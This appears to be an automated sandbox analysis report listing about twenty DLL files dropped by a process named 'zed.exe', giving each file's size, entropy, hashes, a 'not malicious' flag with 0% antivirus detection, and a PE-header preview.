                                                                                                                                                                                                                                            SSDEEP:384:nUX0JfbRwUtPMbNv37t6K5jwbDEpJgLa0Mp8xCkgJrAm:jNbRw8EbxwKBwbD+gLa1nh
                                                                                                                                                                                                                                            MD5:3727271FE04ECB6D5E49E936095E95BC
                                                                                                                                                                                                                                            SHA1:46182698689A849A8C210A8BF571D5F574C6F5B1
                                                                                                                                                                                                                                            SHA-256:3AF5B35DCD5A3B6C7E88CEE53F355AAFFF40F2C21DABD4DE27DBB57D1A29B63B
                                                                                                                                                                                                                                            SHA-512:5BED1F4DF678FE90B8E3F1B7C4F68198463E579209B079CB4A40DCAC01CE26AA2417DBE029B196F6F2C6AFAD560E2D1AF9F089ABE37EAD121CA10EE69D9659ED
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.g.:...:...:...3...>...h...8...q...9...:.......h...1...h...2...h...9.......;.......;.......;.......;...Rich:...................PE..d...W..f.........." .....(...0......P.....................................................`.........................................0Y.......Y..d............p..................0....Q...............................R..8............@...............................text...H'.......(.................. ..`.rdata.......@... ...,..............@..@.data...H....`.......L..............@....pdata.......p.......N..............@..@.rsrc................R..............@..@.reloc..0............T..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):17920
                                                                                                                                                                                                                                            Entropy (8bit):5.293810509074883
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:384:4PHoDUntQjNB+/yw/pogeXOvXoTezczOo3p9iJgDQ3iNgnVbwhA:dUOhBcDRogeXOfoTezcio3pUJgDQ3i+
                                                                                                                                                                                                                                            MD5:78AEF441C9152A17DD4DC40C7CC9DF69
                                                                                                                                                                                                                                            SHA1:6BB6F8426AFA6522E647DFC82B1B64FAF3A9781F
                                                                                                                                                                                                                                            SHA-256:56E4E4B156295F1AAA22ECB5481841DE2A9EB84845A16E12A7C18C7C3B05B707
                                                                                                                                                                                                                                            SHA-512:27B27E77BE81B29D42359FE28531225383860BCD19A79044090C4EA58D9F98009A254BF63585979C60B3134D47B8233941ABB354A291F23C8641A4961FA33107
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.G.:.).:.).:.).3...>.).h.(.8.).q.(.9.).:.(...).h.,.1.).h.-.2.).h.*.9.)...!.;.)...).;.).....;.)...+.;.).Rich:.).........................PE..d...Y..f.........." .....(... ......P.....................................................`.........................................pI......lJ..d....p.......`..................(....A...............................A..8............@...............................text....'.......(.................. ..`.rdata.......@.......,..............@..@.data........P.......<..............@....pdata.......`.......>..............@..@.rsrc........p.......B..............@..@.reloc..(............D..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):11776
                                                                                                                                                                                                                                            Entropy (8bit):4.862619033406922
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:0Ga+F/1NtJ9t4udqaj01rlALnNNJSS2sP+YEdMN+F9FdKaWDULk+VOmWbucX6gR7:PF/1n7Guqaj0ktfEON+bMDUlJcqg0Gd
                                                                                                                                                                                                                                            MD5:19E0ABF76B274C12FF624A16713F4999
                                                                                                                                                                                                                                            SHA1:A4B370F556B925F7126BF87F70263D1705C3A0DB
                                                                                                                                                                                                                                            SHA-256:D9FDA05AE16C5387AB46DC728C6EDCE6A3D0A9E1ABDD7ACB8B32FC2A17BE6F13
                                                                                                                                                                                                                                            SHA-512:D03033EA5CF37641FBD802EBEB5019CAEF33C9A78E01519FEA88F87E773DCA92C80B74BA80429B530694DAD0BFA3F043A7104234C7C961E18D48019D90277C8E
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.g.:...:...:...3...>...h...8...q...9...:.......h...1...h...2...h...9.......;.......;.......;.......;...Rich:...................PE..d...Y..f.........." ................P.....................................................`..........................................8.......8..d....`.......P..X............p..(....1...............................1..8............0...............................text............................... ..`.rdata.......0......................@..@.data...H....@.......$..............@....pdata..X....P.......&..............@..@.rsrc........`.......*..............@..@.reloc..(....p.......,..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):14336
                                                                                                                                                                                                                                            Entropy (8bit):5.227045547076371
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:saF/1n7Guqaj0ktrE8o2o+V2rQnjt1wmg9jtveDn4clG6VcqgOvgdd:swGXkFE8Zo+AojO9jZeDf5rgOvgz
                                                                                                                                                                                                                                            MD5:309D6F6B0DD022EBD9214F445CAC7BB9
                                                                                                                                                                                                                                            SHA1:ABD22690B7AD77782CFC0D2393D0C038E16070B0
                                                                                                                                                                                                                                            SHA-256:4FBE188C20FB578D4B66349D50AA6FFE4AB86844FB6427C57738F36780D1E2E2
                                                                                                                                                                                                                                            SHA-512:D1951FE92F83E7774E8E877815BED6E6216D56EF18B7F1C369D678CB6E1814243659E9FA7ABC0D22FB5B34A9D50A51D5A89BA00AE1FDD32157FD0FF9902FB4B7
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.g.:...:...:...3...>...h...8...q...9...:.......h...1...h...2...h...9.......;.......;.......;.......;...Rich:...................PE..d...U..f.........." ................P.....................................................`..........................................8.......9..d....`.......P..@............p..(....2...............................2..8............0...............................text...x........................... ..`.rdata.......0....... ..............@..@.data...H....@......................@....pdata..@....P.......0..............@..@.rsrc........`.......4..............@..@.reloc..(....p.......6..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):13824
                                                                                                                                                                                                                                            Entropy (8bit):5.176369829782773
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:rF/1n7Guqaj0ktrESsrUW+SBjsK5tcQmEreD2mf1AoxkVcqgOvgXQ:rGXkFE/UW575tA2eDp1Ao2rgOvgX
                                                                                                                                                                                                                                            MD5:D54FEB9A270B212B0CCB1937C660678A
                                                                                                                                                                                                                                            SHA1:224259E5B684C7AC8D79464E51503D302390C5C9
                                                                                                                                                                                                                                            SHA-256:032B83F1003A796465255D9B246050A196488BAC1260F628913E536314AFDED4
                                                                                                                                                                                                                                            SHA-512:29955A6569CA6D039B35BB40C56AEEB75FC765600525D0B469F72C97945970A428951BAB4AF9CD21B3161D5BBA932F853778E2674CA83B14F7ABA009FA53566F
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.g.:...:...:...3...>...h...8...q...9...:.......h...1...h...2...h...9.......;.......;.......;.......;...Rich:...................PE..d...U..f.........." ................P.....................................................`..........................................8.......9..d....`.......P..@............p..(....2...............................2..8............0...............................text...h........................... ..`.rdata.......0......................@..@.data...H....@.......,..............@....pdata..@....P......................@..@.rsrc........`.......2..............@..@.reloc..(....p.......4..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):14336
                                                                                                                                                                                                                                            Entropy (8bit):5.047563322651927
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:384:6alCvH32p3/2pnEhKnLg9yH8puzoFaPERIQAvHD9CIg5kP:5CvHmp3OpnEhmLg9yH8puzoFaPERIQgI
                                                                                                                                                                                                                                            MD5:52DCD4151A9177CF685BE4DF48EA9606
                                                                                                                                                                                                                                            SHA1:F444A4A5CBAE9422B408420115F0D3FF973C9705
                                                                                                                                                                                                                                            SHA-256:D54375DC0652358A6E4E744F1A0EAEEAD87ACCD391A20D6FF324FE14E988A122
                                                                                                                                                                                                                                            SHA-512:64C54B89F2637759309ECC6655831C3A6755924ED70CBC51614061542EB9BA9A8AECF6951EB3AB92447247DC4D7D846C88F4957DBBE4484A9AB934343EE27178
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.G.:.).:.).:.).3...>.).h.(.8.).q.(.9.).:.(...).h.,.1.).h.-.2.).h.*.9.)...!.;.)...).;.).....;.)...+.;.).Rich:.).........................PE..d...Q..f.........." ......... ......P.....................................................`.........................................@9.......9..d....`.......P..(............p..(....2...............................2..8............0...............................text...X........................... ..`.rdata..@....0......................@..@.data...x....@......................@....pdata..(....P.......0..............@..@.rsrc........`.......4..............@..@.reloc..(....p.......6..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):13824
                                                                                                                                                                                                                                            Entropy (8bit):5.09893680790018
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:xsiXeqVb0lwbH4P01sAD7I/9hAkwDWzBEbcqgqLg:valqH4M1sAD7KvpwDFtgqLg
                                                                                                                                                                                                                                            MD5:F929B1A3997427191E07CF52AC883054
                                                                                                                                                                                                                                            SHA1:C5EA5B68586C2FB09E5FDD20D4DD616D06F5CBA6
                                                                                                                                                                                                                                            SHA-256:5386908173074FABD95BF269A9DF0A4E1B21C0576923186F449ABF4A820F6A8E
                                                                                                                                                                                                                                            SHA-512:2C79DBCE2C21214D979AB86DD989D41A3AFA7FCB7F3B79BA9974E2EE8F832DD7CA20C1C87C0C380DB037D776FE6D0851D60AD55A08AFDE0003B7E59214DD2F3B
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.G.:.).:.).:.).3...>.).h.(.8.).q.(.9.).:.(...).h.,.1.).h.-.2.).h.*.9.)...!.;.)...).;.).....;.)...+.;.).Rich:.).........................PE..d...R..f.........." ................P.....................................................`.........................................08.......8..d....`.......P..(............p..(....1...............................2..8............0...............................text............................... ..`.rdata..0....0......................@..@.data........@.......,..............@....pdata..(....P......................@..@.rsrc........`.......2..............@..@.reloc..(....p.......4..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):15360
                                                                                                                                                                                                                                            Entropy (8bit):5.451865349855574
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:384:KfwogDHER1wuiDSyoGTgDZOviNgEPrLg:ugDHELwuiDScTgDwi+EP
                                                                                                                                                                                                                                            MD5:1FA5E257A85D16E916E9C22984412871
                                                                                                                                                                                                                                            SHA1:1AC8EE98AD0A715A1B40AD25D2E8007CDC19871F
                                                                                                                                                                                                                                            SHA-256:D87A9B7CAD4C451D916B399B19298DC46AAACC085833C0793092641C00334B8E
                                                                                                                                                                                                                                            SHA-512:E4205355B647C6E28B7E4722328F51DC2EB3A109E9D9B90F7C53D7A80A5A4B10E40ABDDAB1BA151E73EF3EB56941F843535663F42DCE264830E6E17BB659EADF
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.G.:.).:.).:.).3...>.).h.(.8.).q.(.9.).:.(...).h.,.1.).h.-.2.).h.*.9.)...!.;.)...).;.).....;.)...+.;.).Rich:.).........................PE..d...R..f.........." ..... ..........P.....................................................`..........................................8......`9..d....`.......P..X............p..(....1...............................1..8............0...............................text............ .................. ..`.rdata.......0.......$..............@..@.data........@.......2..............@....pdata..X....P.......4..............@..@.rsrc........`.......8..............@..@.reloc..(....p.......:..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):13824
                                                                                                                                                                                                                                            Entropy (8bit):5.104245335186531
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:3F/1n7Guqaj0kt7/Ev9kt0Qwac6QzD8iD0QocqgI4G0S:nGXkd/EvGt9wacNDvAgI4v
                                                                                                                                                                                                                                            MD5:FAD578A026F280C1AE6F787B1FA30129
                                                                                                                                                                                                                                            SHA1:9A3E93818A104314E172A304C3D117B6A66BEB55
                                                                                                                                                                                                                                            SHA-256:74A1FF0801F4704158684267CD8E123F83FB6334FE522C1890AC4A0926F80AB1
                                                                                                                                                                                                                                            SHA-512:ACF8F5B382F3B4C07386505BBDCAF625D13BCC10AA93ED641833E3548261B0AD1063E2F59BE2FCD2AFAF3D315CB3FC5EB629CEFC168B33CFD65A3A6F1120F7FF
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.g.:...:...:...3...>...h...8...q...9...:.......h...1...h...2...h...9.......;.......;.......;.......;...Rich:...................PE..d...U..f.........." ......... ......P.....................................................`..........................................9.......:..d....`.......P...............p..(...@3..............................`3..8............0...............................text...H........................... ..`.rdata.......0......................@..@.data...H....@.......,..............@....pdata.......P......................@..@.rsrc........`.......2..............@..@.reloc..(....p.......4..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):17920
                                                                                                                                                                                                                                            Entropy (8bit):5.671305741258107
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:384:APHoDUntQj0sKhDOJ+0QPSfu6rofDjiZzgE+kbwb:VUOYsKNO466DjoUE+
                                                                                                                                                                                                                                            MD5:556E6D0E5F8E4DA74C2780481105D543
                                                                                                                                                                                                                                            SHA1:7A49CDEF738E9FE9CD6CD62B0F74EAD1A1774A33
                                                                                                                                                                                                                                            SHA-256:247B0885CF83375211861F37B6DD1376AED5131D621EE0137A60FE7910E40F8B
                                                                                                                                                                                                                                            SHA-512:28FA0CE6BDBCC5E95B80AADC284C12658EF0C2BE63421AF5627776A55050EE0EA0345E30A15B744FC2B2F5B1B1BBB61E4881F27F6E3E863EBAAEED1073F4CDA1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.G.:.).:.).:.).3...>.).h.(.8.).q.(.9.).:.(...).h.,.1.).h.-.2.).h.*.9.)...!.;.)...).;.).....;.)...+.;.).Rich:.).........................PE..d...R..f.........." .....*..........P.....................................................`..........................................H......hI..d....p.......`..X...............(....A...............................A..8............@...............................text....).......*.................. ..`.rdata.......@......................@..@.data........P.......<..............@....pdata..X....`.......>..............@..@.rsrc........p.......B..............@..@.reloc..(............D..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):21504
                                                                                                                                                                                                                                            Entropy (8bit):5.878701941774916
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:384:EJWo4IRCGHX1KXqHGcvYHp5RYcARQOj4MSTjqgPmJD1OhgkxEv:EcIRnHX1P/YtswvaD1Rk
                                                                                                                                                                                                                                            MD5:2F2655A7BBFE08D43013EDDA27E77904
                                                                                                                                                                                                                                            SHA1:33D51B6C423E094BE3E34E5621E175329A0C0914
                                                                                                                                                                                                                                            SHA-256:C734ABBD95EC120CB315C43021C0E1EB1BF2295AF9F1C24587334C3FCE4A5BE1
                                                                                                                                                                                                                                            SHA-512:8AF99ACC969B0E560022F75A0CDCAA85D0BDEADADEACD59DD0C4500F94A5843EA0D4107789C1A613181B1F4E5252134A485EF6B1D9D83CDB5676C5FEE4D49B90
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.G.:.).:.).:.).3...>.).h.(.8.).q.(.9.).:.(...).h.,.1.).h.-.2.).h.*.9.)...!.;.)...).;.).....;.)...+.;.).Rich:.).........................PE..d...S..f.........." .....6... ......P.....................................................`.........................................@Z......([..d............p..................(....R...............................R..8............P...............................text....5.......6.................. ..`.rdata..x....P.......:..............@..@.data........`.......J..............@....pdata.......p.......L..............@..@.rsrc................P..............@..@.reloc..(............R..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):21504
                                                                                                                                                                                                                                            Entropy (8bit):5.881781476285865
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:384:EJWo4IRCGHXfKXqHGcvYHp5RYcARQOj4MSTjqgPmJD12gkxEv:EcIRnHXfP/YtswvaD1zk
                                                                                                                                                                                                                                            MD5:CDE035B8AB3D046B1CE37EEE7EE91FA0
                                                                                                                                                                                                                                            SHA1:4298B62ED67C8D4F731D1B33E68D7DC9A58487FF
                                                                                                                                                                                                                                            SHA-256:16BEA322D994A553B293A724B57293D57DA62BC7EAF41F287956B306C13FD972
                                                                                                                                                                                                                                            SHA-512:C44FDEE5A210459CE4557351E56B2D357FD4937F8EC8EACEAB842FEE29761F66C2262FCBAAC837F39C859C67FA0E23D13E0F60B3AE59BE29EB9D8ABAB0A572BB
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.G.:.).:.).:.).3...>.).h.(.8.).q.(.9.).:.(...).h.,.1.).h.-.2.).h.*.9.)...!.;.)...).;.).....;.)...+.;.).Rich:.).........................PE..d...S..f.........." .....6... ......P.....................................................`.........................................@Z......([..d............p..................(....R...............................R..8............P...............................text....5.......6.................. ..`.rdata..x....P.......:..............@..@.data........`.......J..............@....pdata.......p.......L..............@..@.rsrc................P..............@..@.reloc..(............R..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):26624
                                                                                                                                                                                                                                            Entropy (8bit):5.837887867708438
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:768:e839Cc4itui0gel9soFdkO66MlPGXmXcyYDTzks:Ns4u/FZ6nPxMLDvk
                                                                                                                                                                                                                                            MD5:999D431197D7E06A30E0810F1F910B9A
                                                                                                                                                                                                                                            SHA1:9BFF781221BCFFD8E55485A08627EC2A37363C96
                                                                                                                                                                                                                                            SHA-256:AB242B9C9FB662C6F7CB57F7648F33983D6FA3BB0683C5D4329EC2CC51E8C875
                                                                                                                                                                                                                                            SHA-512:A5DD92DD471ADB44EEFE5919EF9CA3978724E21174DF5B3A9C1F0AB462F928E5A46A460D02417DB7522F5DE3BFEED5EEE6B1EAFAF3E621722E85E72675F7096F
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.G.:.).:.).:.).3...>.).h.(.8.).q.(.9.).:.(...).h.,.1.).h.-.2.).h.*.9.)...!.;.)...).;.).....;.)...+.;.).Rich:.).........................PE..d...T..f.........." .....H..."......P.....................................................`..........................................k.......l..d...............................(...pd...............................d..8............`...............................text....F.......H.................. ..`.rdata.......`.......L..............@..@.data................^..............@....pdata...............`..............@..@.rsrc................d..............@..@.reloc..(............f..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):26624
                                                                                                                                                                                                                                            Entropy (8bit):5.895310340516013
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:768:lcX9Nf4ttui0gel9soFdkO66MlPGXmXc/vDTOvk:a38u/FZ6nPxM3DAk
                                                                                                                                                                                                                                            MD5:0931ABBF3AED459B1A2138B551B1D3BB
                                                                                                                                                                                                                                            SHA1:9EC0296DDAF574A89766A2EC035FC30073863AB0
                                                                                                                                                                                                                                            SHA-256:1729A0DC6B80CB7A3C07372B98B10D3C6C613EA645240878E1FDE6A992FA06F1
                                                                                                                                                                                                                                            SHA-512:9F970BB4D10B94F525DDDDE307C7DA5E672BBFB3A3866A34B89B56ADA99476724FD690A4396857182749294F67F36DB471A048789FB715D2A7DAF46917FC1947
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.G.:.).:.).:.).3...>.).h.(.8.).q.(.9.).:.(...).h.,.1.).h.-.2.).h.*.9.)...!.;.)...).;.).....;.)...+.;.).Rich:.).........................PE..d...T..f.........." .....H..."......P.....................................................`.........................................@l......(m..d...............................(....d...............................e..8............`...............................text...hG.......H.................. ..`.rdata..x....`.......L..............@..@.data................^..............@....pdata...............`..............@..@.rsrc................d..............@..@.reloc..(............f..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):12800
                                                                                                                                                                                                                                            Entropy (8bit):4.967737129255606
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:dMpWt/1nCuqaL0kt7TsEx2fiTgDZqGF0T7cqgkLgJ:k/k1Ts64DDJyBgkLg
                                                                                                                                                                                                                                            MD5:5F057A380BACBA4EF59C0611549C0E02
                                                                                                                                                                                                                                            SHA1:4B758D18372D71F0AA38075F073722A55B897F71
                                                                                                                                                                                                                                            SHA-256:BCB14DAC6C87C24269D3E60C46B49EFFB1360F714C353318F5BBAA48C79EC290
                                                                                                                                                                                                                                            SHA-512:E1C99E224745B86EE55822C1DBCB4555A11EC31B72D87B46514917EB61E0258A1C6D38C4F592969C17EB4F0F74DA04BCECA31CF1622720E95F0F20E9631792E8
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r^J.6?$.6?$.6?$.?G..2?$.dJ%.4?$.}G%.5?$.6?%..?$.dJ!.<?$.dJ .>?$.dJ'.5?$..J,.7?$..J$.7?$..J..7?$..J&.7?$.Rich6?$.........................PE..d...V..f.........." ................P.....................................................`.........................................P8.......8..d....`.......P...............p..(....1...............................1..8............0...............................text............................... ..`.rdata..2....0......................@..@.data...H....@.......(..............@....pdata.......P.......*..............@..@.rsrc........`......................@..@.reloc..(....p.......0..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):13312
                                                                                                                                                                                                                                            Entropy (8bit):5.007867576025166
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:bMt/1nCuqaL0ktPH0T7fwtF4zDn2rGacqgRGd:1/kpU3Yv4zDXqgRGd
                                                                                                                                                                                                                                            MD5:49BCA1B7DF076D1A550EE1B7ED3BD997
                                                                                                                                                                                                                                            SHA1:47609C7102F5B1BCA16C6BAD4AE22CE0B8AEE9E9
                                                                                                                                                                                                                                            SHA-256:49E15461DCB76690139E71E9359F7FCF92269DCCA78E3BFE9ACB90C6271080B2
                                                                                                                                                                                                                                            SHA-512:8574D7FA133B72A4A8D1D7D9FDB61053BC88C2D238B7AC7D519BE19972B658C44EA1DE433885E3206927C75DD5D1028F74999E048AB73189585B87630F865466
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.:...:...:...3.j.>...h...8...q...9...:.......h...1...h...2...h...9.......;.......;.......;.......;...Rich:...........................PE..d...V..f.........." ................P.....................................................`..........................................8.......8..d....`.......P..X............p..(....1...............................1..8............0...............................text............................... ..`.rdata.......0......................@..@.data...H....@.......*..............@....pdata..X....P.......,..............@..@.rsrc........`.......0..............@..@.reloc..(....p.......2..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):15872
                                                                                                                                                                                                                                            Entropy (8bit):5.226023387740053
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:384:rfRKTN+HLjRskTdf4WazSTkwjEvuY2bylHDiYIgovg:mcHfRl5pauoSjy5DiE
                                                                                                                                                                                                                                            MD5:CB5CFDD4241060E99118DEEC6C931CCC
                                                                                                                                                                                                                                            SHA1:1E7FED96CF26C9F4730A4621CA9D18CECE3E0BCE
                                                                                                                                                                                                                                            SHA-256:A8F809B6A417AF99B75EEEEA3ECD16BDA153CBDA4FFAB6E35CE1E8C884D899C4
                                                                                                                                                                                                                                            SHA-512:8A89E3563C14B81353D251F9F019D8CBF07CB98F78452B8522413C7478A0D77B9ABF2134E4438145D6363CDA39721D2BAE8AD13D1CDACCBB5026619D95F931CF
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
